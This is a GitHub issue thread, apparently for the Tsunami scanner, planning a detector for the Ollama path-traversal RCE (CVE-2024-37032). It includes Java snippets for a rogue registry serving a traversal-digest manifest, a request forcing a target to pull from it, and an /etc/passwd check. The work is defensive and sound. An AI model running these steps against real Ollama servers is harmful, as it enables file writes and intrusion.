AI PRP: Ollama Remote Code Execution Vulnerability #511

Open
grandsilva opened this issue Jun 24, 2024 · 16 comments
@grandsilva

According to this research:

Ollama’s HTTP server exposes multiple API endpoints that perform various actions.

This RCE relies on an arbitrary file write primitive to gain code execution. I'm not sure whether that is the preferred approach for writing Tsunami plugins.

If you're interested in developing a Tsunami plugin to detect exposed Ollama HTTP servers, I'll proceed with further research on this case.
(However, I think Ollama is currently one of the most popular open-source repositories on GitHub, maybe the most popular.)

links:
https://github.com/ollama/ollama
https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
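
For the detection side, a minimal sketch of a probe against an exposed instance is shown below. It assumes the documented GET /api/tags endpoint and Ollama's default port 11434, and it is only an illustration, not Tsunami plugin code:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

// Minimal sketch of a fingerprint probe for an exposed Ollama HTTP server.
// Assumes the documented /api/tags endpoint; host and port are placeholders.
public class OllamaProbe {
  public static void main(String[] args) throws Exception {
    String target = "http://127.0.0.1:11434"; // Ollama's default port
    HttpClient client = HttpClient.newHttpClient();
    HttpRequest request = HttpRequest.newBuilder()
        .uri(URI.create(target + "/api/tags"))
        .GET()
        .build();
    HttpResponse<String> response =
        client.send(request, HttpResponse.BodyHandlers.ofString());
    // An exposed instance answers 200 with a JSON body listing local models.
    boolean looksLikeOllama =
        response.statusCode() == 200 && response.body().contains("\"models\"");
    System.out.println("Exposed Ollama API: " + looksLikeOllama);
  }
}
```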

@tooryx
Member

tooryx commented Jun 24, 2024

Hi @grandsilva,

Could you start by writing a fingerprint for Ollama?
If so, could you please create a new issue for it, and I will approve it.

~tooryx

@grandsilva
Author

Hi @tooryx
I'm not sure a fingerprint applies here, since this is an API. Also, I'm not interested in writing fingerprints; could you create a fingerprint PRP so that someone else who is interested in writing fingerprints can pick up the request?

@tooryx
Member

tooryx commented Jun 24, 2024

Thanks @grandsilva. Anyone who is interested in writing that fingerprint can then create the issue, and I will accept it. Feel free to suggest other plugins in the meantime.

~tooryx

@maoning
Collaborator

maoning commented Jun 27, 2024

@grandsilva Could you start the vulnerability research and focus on these two areas:

  1. For the RCE, what would be an easy way for Tsunami to verify it via the arbitrary file write? We may not want to do this on every scan, because we don't want Tsunami to perform state-changing actions. However, if it is easy to support, we could make it an optional config for users to toggle.
  2. Does the presence of an arbitrary file read always indicate the existence of an arbitrary file write? If that is the case, we could report the vulnerability whenever we can read the /etc/passwd file, for example (see the sketch after this comment).

Please respond in a timely manner; I will monitor this thread. Thanks!
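
On point 2, if a read primitive can be confirmed, the usual low-risk validation is to look for the root entry of /etc/passwd in whatever response the exploit surfaces. A hedged sketch of that check (the class and method names are illustrative, not existing Tsunami APIs):

```java
import java.util.regex.Pattern;

// Sketch of the usual /etc/passwd validation: the root entry is a stable,
// low-impact signature to confirm an arbitrary file read primitive.
public class PasswdCheck {
  private static final Pattern ROOT_ENTRY = Pattern.compile("root:[^:\\r\\n]*:0:0:");

  static boolean looksLikeEtcPasswd(String responseBody) {
    return ROOT_ENTRY.matcher(responseBody).find();
  }

  public static void main(String[] args) {
    System.out.println(looksLikeEtcPasswd("root:x:0:0:root:/root:/bin/bash")); // true
  }
}
```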

maoning added the ai-bounty-prp (Identify an AI bounty plugin) and PRP:Accepted labels on Jun 27, 2024
@grandsilva
Author

@maoning we need to host a Docker image; hosting the image is possible with the GitHub Container Registry.
But we still have a problem: the hosting has to be dynamic, because the payload must contain the callback server address.
Regarding the arbitrary file read, it is not reflective; we must be able to see the bodies of the requests sent to our Docker registry in order to read files and exploit this vulnerability.

Another option is hosting a Docker image that runs a web server with the four or five endpoints required by the Docker Image Manifest V2 specification (a minimal sketch follows this comment).

We can also send arbitrary GET requests to check for an exposed API server, but it is unlikely that we can validate the arbitrary file write and file read CVEs via SSRF alone.
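
For reference, a minimal sketch of such a registry stub, using Java's built-in HttpServer. The endpoint paths follow the Docker Registry HTTP API V2 naming, and the manifest body with a traversal digest is purely illustrative (modelled on the public write-ups, not a verified exploit):

```java
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;

// Minimal sketch of a rogue registry stub. Endpoint paths follow the Docker
// Registry HTTP API V2 convention; the manifest body and the traversal digest
// are illustrative only.
public class RogueRegistryStub {
  public static void main(String[] args) throws IOException {
    HttpServer server = HttpServer.create(new InetSocketAddress(8000), 0);

    // Version check: registry clients usually probe this endpoint first.
    server.createContext("/v2/", exchange -> respond(exchange, "{}"));

    // Manifest endpoint: returns a manifest whose layer digest carries a
    // path traversal payload (illustrative value only).
    server.createContext("/v2/library/evil/manifests/", exchange -> respond(exchange,
        "{\"schemaVersion\":2,"
            + "\"layers\":[{\"digest\":\"../../../../../../tmp/poc\",\"size\":1}]}"));

    server.start();
    System.out.println("Rogue registry stub listening on :8000");
  }

  private static void respond(HttpExchange exchange, String body) throws IOException {
    byte[] bytes = body.getBytes(StandardCharsets.UTF_8);
    exchange.getResponseHeaders().set("Content-Type", "application/json");
    exchange.sendResponseHeaders(200, bytes.length);
    try (OutputStream out = exchange.getResponseBody()) {
      out.write(bytes);
    }
  }
}
```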

@maoning
Collaborator

maoning commented Jul 3, 2024

@grandsilva could you elaborate more on how the docker image interacts with the target Ollama service?

@grandsilva
Author

OK, sorry about the poor explanation.

An API endpoint of the Ollama web server allows pulling an arbitrary Docker image, where "arbitrary" means from an arbitrary registry server.
That server must be an HTTP server exposing the endpoints required by the Docker Image Manifest V2 specification; in other words, certain HTTP endpoints must exist on this Docker registry server so that a docker pull ourServer/image:tag style request works.

We need to control this Docker registry HTTP server because we have to deliver our payload when the target Ollama web server pulls our Docker image (the image acts as the exploit payload), so we must run a custom HTTP server.

A researcher has already written such an HTTP server: https://github.com/Bi0x/CVE-2024-37032

Since we can make the target pull from an arbitrary URL, we can also make it send a GET request to the Tsunami callback server (see the sketch below).
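
Concretely, the trigger could be a single request to the target's /api/pull endpoint, with the model name pointing at a host we control. A minimal sketch (the request fields follow the public Ollama API documentation; the host names are placeholders):

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

// Sketch of the trigger request: ask the target Ollama instance to pull a
// "model" whose name points at a scanner-controlled registry. "insecure": true
// allows a plain-HTTP registry. Host names are placeholders, not real targets.
public class PullTrigger {
  public static void main(String[] args) throws Exception {
    String target = "http://target-ollama.example:11434";
    String payload =
        "{\"name\": \"scanner-registry.example:8000/library/evil:latest\", \"insecure\": true}";
    HttpRequest request = HttpRequest.newBuilder()
        .uri(URI.create(target + "/api/pull"))
        .header("Content-Type", "application/json")
        .POST(HttpRequest.BodyPublishers.ofString(payload))
        .build();
    HttpResponse<String> response =
        HttpClient.newHttpClient().send(request, HttpResponse.BodyHandlers.ofString());
    // Out-of-band confirmation would come from the controlled registry (or the
    // Tsunami callback server) receiving the /v2/... requests from the target.
    System.out.println("Pull request returned HTTP " + response.statusCode());
  }
}
```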

@tooryx
Member

tooryx commented Jul 8, 2024

Hey @grandsilva,

Could you take a look at using images such as curl or bash to try to communicate with the callback server? Would that work? Would any image or deployment be left on the target after exploitation?

Cheers,
~tooryx

@tooryx
Member

tooryx commented Jul 16, 2024

Hi @grandsilva,

What are your thoughts on this?

~tooryx

@grandsilva
Author

@tooryx I need more time because I need to do more research on this one; could you let me work on a different PRP instead? I want to write a plugin, but I have been waiting for over a month to get my first PRP accepted. I think you would be OK with an RCE in GeoServer.

@tooryx
Member

tooryx commented Jul 17, 2024

Hi @grandsilva, I will discuss this with the rest of the team, but as far as I know we are a lot less interested in GeoServer.

~tooryx

@tooryx
Member

tooryx commented Jul 17, 2024

Hi @grandsilva,

In that case, I will release this one to be grabbed by other contributors.

~tooryx

tooryx added the help wanted (Extra attention is needed) label and removed the PRP:Accepted label on Jul 17, 2024
@OccamsXor
Contributor

Hi @tooryx @maoning,

I'd like to help with this issue. Can you assign it to me?

@tooryx
Member

tooryx commented Jul 31, 2024

Hi @OccamsXor, you can work on this.

~tooryx

tooryx added the Contributor main (The main issue a contributor is working on, top of the contribution queue) label on Jul 31, 2024
@OccamsXor
Contributor

Hi @tooryx @maoning,

I checked a couple of vulnerability analysis posts for CVE-2024-37032, and it seems that exploiting it requires a web server that behaves as a private registry and supplies the vulnerable system with a malicious manifest file containing a path traversal payload in the digest field.

@grandsilva also mentioned the same issue here: #511 (comment)

My question is this: does Tsunami have functionality that would allow us to start a custom web server during scanning? The web server would need to serve responses determined by the plugin.

Ref: https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

@tooryx
Member

tooryx commented Aug 6, 2024

Hi @OccamsXor,

No, Tsunami does not currently have such a capability. I will chat with the rest of the team to see if we can find a solution for this.

~tooryx

tooryx removed the help wanted (Extra attention is needed) label on Aug 16, 2024